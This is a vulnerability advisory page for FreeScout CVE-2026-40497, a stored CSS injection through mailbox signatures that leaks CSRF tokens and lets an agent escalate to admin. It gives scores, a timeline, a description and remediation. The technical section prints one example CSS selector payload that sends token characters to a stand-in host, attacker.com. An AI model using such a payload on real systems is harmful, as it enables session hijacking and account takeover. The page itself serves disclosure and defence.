Skip to main content

Freescout CVE-2026-40497

| EUVDEUVD-2026-24052 HIGH
Cross-site Scripting (XSS) (CWE-79)
2026-04-21 GitHub_M
8.1
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.1 HIGH
AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
Required
Scope
Changed
Confidentiality
High
Integrity
High
Availability
None

Lifecycle Timeline

9
Patch released
Apr 23, 2026 - 16:32 nvd
Patch available
Analysis Updated
Apr 21, 2026 - 14:29 vuln.today
v3 (cvss_changed)
Patch available
Apr 21, 2026 - 05:01 EUVD
Analysis Updated
Apr 21, 2026 - 03:27 vuln.today
v2 (cvss_changed)
Re-analysis Queued
Apr 21, 2026 - 03:22 vuln.today
cvss_changed
Analysis Generated
Apr 21, 2026 - 02:55 vuln.today
EUVD ID Assigned
Apr 21, 2026 - 02:45 euvd
EUVD-2026-24052
Analysis Generated
Apr 21, 2026 - 02:45 vuln.today
CVE Published
Apr 21, 2026 - 01:45 nvd
HIGH 8.1

DescriptionGitHub Advisory

FreeScout is a free self-hosted help desk and shared mailbox. Prior to version 1.8.213, FreeScout's Helper::stripDangerousTags() removes <script>, <form>, <iframe>, <object> but does NOT strip <style> tags. The mailbox signature field is saved via POST /mailbox/settings/{id} and later rendered unescaped via {!! $conversation->getSignatureProcessed([], true) !!} in conversation views. CSP allows style-src * 'self' 'unsafe-inline', so injected inline styles execute freely. An attacker with access to mailbox settings (admin or agent with mailbox permission) can inject CSS attribute selectors to exfiltrate the CSRF token of any agent/admin who views a conversation in that mailbox. With the CSRF token, the attacker can perform any state-changing action as the victim (create admin accounts, change email/password, etc.) - privilege escalation from agent to admin. This is the result of an incomplete fix of GHSA-jqjf-f566-485j. That advisory reported XSS via mailbox signature. The fix applied Helper::stripDangerousTags() to the signature before saving. However, stripDangerousTags() only removes script, form, iframe, and object tags - it does NOT strip <style> tags, leaving CSS injection possible. Version 1.8.213 contains an updated fix.

AnalysisAI

CSS injection in FreeScout mailbox signatures enables CSRF token exfiltration and privilege escalation from authenticated agents to administrators. The vulnerability exists in FreeScout versions prior to 1.8.213 where incomplete input sanitization fails to strip <style> tags from mailbox signature fields. Attackers with mailbox configuration access leverage CSS attribute selectors to steal CSRF tokens from viewing users, then perform arbitrary state-changing actions including admin account creation. EPSS data not available; no confirmed active exploitation (CISA KEV absent). Vendor patch released in version 1.8.213 with complete fix addressing previous incomplete remediation (GHSA-jqjf-f566-485j).

Technical ContextAI

FreeScout is a PHP-based open-source help desk system with shared mailbox functionality (cpe:2.3:a:freescout-help-desk:freescout). The vulnerability stems from CWE-79 (Improper Neutralization of Input During Web Page Generation) in the Helper::stripDangerousTags() sanitization function. This function removes <script>, <form>, <iframe>, and <object> tags but omits <style> tags. Mailbox signatures are saved via POST /mailbox/settings/{id} and rendered server-side using Laravel Blade syntax {!! $conversation->getSignatureProcessed([], true) !!} without HTML escaping. The application's Content Security Policy permits 'unsafe-inline' for style-src, allowing injected CSS to execute. CSS attribute selectors (e.g., input[name^='_token'][value^='a'] { background: url(//attacker.com?a); }) can be weaponized to exfiltrate CSRF tokens character-by-character through external resource requests, enabling Cross-Site Request Forgery attacks that bypass Same-Origin Policy protections.

RemediationAI

Upgrade FreeScout to version 1.8.213 or later immediately, which contains comprehensive fix via commit 5aa8d633216f65995e80a7d4a921b784acc94df4 (https://github.com/freescout-help-desk/freescout/commit/5aa8d633216f65995e80a7d4a921b784acc94df4). Release details at https://github.com/freescout-help-desk/freescout/releases/tag/1.8.213. If immediate upgrade is not feasible, implement compensating controls: (1) Restrict mailbox settings access to only fully-trusted administrators via role-based access controls, removing this permission from agent roles (trade-off: reduces operational flexibility). (2) Implement Web Application Firewall rules to block <style> tags in POST requests to /mailbox/settings/* endpoints (trade-off: may cause false positives if legitimate styling is needed, requires WAF infrastructure). (3) Modify Content Security Policy to remove 'unsafe-inline' from style-src directive and use nonce-based CSP (trade-off: requires application code changes to add nonces to legitimate inline styles, potentially breaking existing functionality). (4) Deploy network egress monitoring to detect CSS exfiltration attempts via unusual external resource requests from authenticated sessions (trade-off: generates alert fatigue, requires SIEM correlation). Patch is strongly preferred as workarounds significantly impact usability.

CVE-2026-28289 CRITICAL POC
10.0 Mar 03

File upload bypass in FreeScout 1.8.206 — patch bypass for CVE-2026-27636. PoC and patch available. CVSS 10.0.

CVE-2026-27636 HIGH POC
8.8 Feb 25

Remote code execution in FreeScout prior to version 1.8.206 allows authenticated users to upload `.htaccess` files that

CVE-2026-27637 CRITICAL POC
9.8 Feb 25

Predictable password reset tokens in FreeScout help desk before 1.8.206. Weak random number generation allows attackers

CVE-2024-29185 CRITICAL POC
9.0 Mar 22

FreeScout is a self-hosted help desk and shared mailbox. Rated critical severity (CVSS 9.0), this vulnerability is remot

CVE-2024-29184 HIGH POC
8.0 Mar 22

FreeScout is a self-hosted help desk and shared mailbox. Rated high severity (CVSS 8.0), this vulnerability is remotely

CVE-2024-28186 HIGH POC
7.1 Mar 12

FreeScout is an open source help desk and shared inbox built with PHP. Rated high severity (CVSS 7.1), this vulnerabilit

CVE-2024-34698 MEDIUM POC
6.3 May 14

FreeScout is a free, self-hosted help desk and shared mailbox. Rated medium severity (CVSS 6.3), this vulnerability is r

CVE-2024-34697 MEDIUM POC
6.1 May 14

FreeScout is a free, self-hosted help desk and shared mailbox. Rated medium severity (CVSS 6.1), this vulnerability is r

CVE-2026-32754 CRITICAL
9.3 Mar 19

A stored cross-site scripting (XSS) vulnerability exists in FreeScout help desk software versions 1.8.208 and below, whe

CVE-2026-41193 CRITICAL
9.1 Apr 21

Arbitrary file write in FreeScout (prior to 1.8.215) allows authenticated administrators to achieve remote code executio

CVE-2026-41902 CRITICAL
9.1 May 07

Unauthenticated account takeover in FreeScout versions prior to 1.8.217 allows remote attackers to gain permanent access

CVE-2026-40498 HIGH
8.9 Apr 21

Unauthenticated remote attackers can access administrative diagnostic endpoints in FreeScout versions prior to 1.8.213,

Share

CVE-2026-40497 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy